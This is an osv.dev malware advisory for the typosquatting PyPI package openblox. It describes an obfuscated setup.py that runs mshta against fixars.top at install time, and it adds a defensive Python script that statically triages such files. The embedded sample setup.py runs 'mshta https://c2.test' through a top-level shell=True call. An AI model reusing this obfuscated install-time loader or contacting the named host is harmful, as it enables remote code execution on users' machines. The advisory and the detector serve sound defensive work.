openblox @1.0.1
Vulnerability report · Last retrieved from osv.dev June 26, 2026 at 2:48 PM UTC
OSV ID
MAL-2026-6504
Ecosystem
pypi
Summary
setup.py invokes GetGitCommitHash() unconditionally at module top level, so it runs on pip install openblox (and any other setuptools invocation). On Windows the function builds its command via two helpers (GetDefaultSystemPolicy, CalculateNodeDrift) that reconstruct strings from integer arrays using chr(byte + 14); the arrays decode to mshta and https://fixars.top. The resulting command is passed to subprocess.check_output with shell=True, causing Windows installers to launch mshta https://fixars.top — the mshta.exe Living-Off-The-Land binary downloads and executes remote HTA/JScript, giving the operator arbitrary code execution on the installer's machine. The obfuscation (chr-arithmetic with helper functions falsely named for hardware/latency diagnostics) exists solely to hide the URL and binary name from static scanners. The package additionally exhibits a cover-story shape: it is published under the name openblox with a Roblox-themed description, but the actual code is an unrelated sqligen SQLite utility, with placeholder author metadata (John / john@example.com / github.com/john/sqligen). The Roblox-library name appears chosen to attract installs intended for the legitimate openblox API library.
Source: amazon-inspector (cdd874a78973f84b5373fc03a48472c338ca82ef0a258b7614f81a8359da1201)
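As an added defensive illustration (not part of the OSV record or of the package), the following Python triages a setup.py with the shape described in the summary: it lists module-level call statements that execute on any setuptools invocation, flags subprocess calls made with shell=True, and statically decodes chr(b + N) integer arrays so the hidden strings can be reviewed without executing the file. The embedded setup.py, its integer arrays and the decoded URL are constructed placeholders, not the real package's values.

```python
import ast
# Constructed sample that mimics the reported setup.py shape; arrays decode to placeholders, not the real package's values.
SAMPLE_SETUP_PY = '''
import subprocess
def GetDefaultSystemPolicy():
    return "".join(chr(b + 14) for b in [95, 101, 90, 102, 83])
def CalculateNodeDrift():
    return "".join(chr(b + 14) for b in [90, 102, 102, 98, 101, 44, 33, 33, 85, 36, 32, 102, 87, 101, 102])
def GetGitCommitHash():
    return subprocess.check_output(GetDefaultSystemPolicy() + " " + CalculateNodeDrift(), shell=True)
GetGitCommitHash()
'''

def chr_offset(node):
    """Return N when node is chr(<expr> + N) or chr(N + <expr>), else None."""
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id == "chr"
            and len(node.args) == 1 and isinstance(node.args[0], ast.BinOp)
            and isinstance(node.args[0].op, ast.Add)):
        for side in (node.args[0].left, node.args[0].right):
            if isinstance(side, ast.Constant) and isinstance(side.value, int):
                return side.value
    return None

def int_list(node):
    # Values of a literal list of ints, else None.
    if isinstance(node, ast.List) and node.elts and all(
            isinstance(e, ast.Constant) and isinstance(e.value, int) for e in node.elts):
        return [e.value for e in node.elts]
    return None

def triage_setup_py(source):
    tree = ast.parse(source)
    findings = {"toplevel_calls": [], "shell_true_calls": [], "decoded_strings": []}
    # 1. Module-level call statements run on every setuptools invocation, including pip install.
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            findings["toplevel_calls"].append(ast.unparse(stmt.value.func))
    for node in ast.walk(tree):
        # 2. subprocess.* invoked with shell=True anywhere in the file.
        if isinstance(node, ast.Call) and ast.unparse(node.func).startswith("subprocess."):
            if any(kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True
                   for kw in node.keywords):
                findings["shell_true_calls"].append(ast.unparse(node.func))
        # 3. "".join(chr(b + N) for b in [...]): recover the hidden string without running it.
        if isinstance(node, (ast.GeneratorExp, ast.ListComp)):
            offset, ints = chr_offset(node.elt), int_list(node.generators[0].iter)
            if offset is not None and ints is not None:
                findings["decoded_strings"].append("".join(chr(b + offset) for b in ints))
    findings["suspicious"] = bool(findings["toplevel_calls"] and findings["shell_true_calls"])
    return findings
```

A plain setup.py whose only top-level call is setup(...) still appears under toplevel_calls, so the decoded strings and shell=True finding are what separate this pattern from an ordinary package.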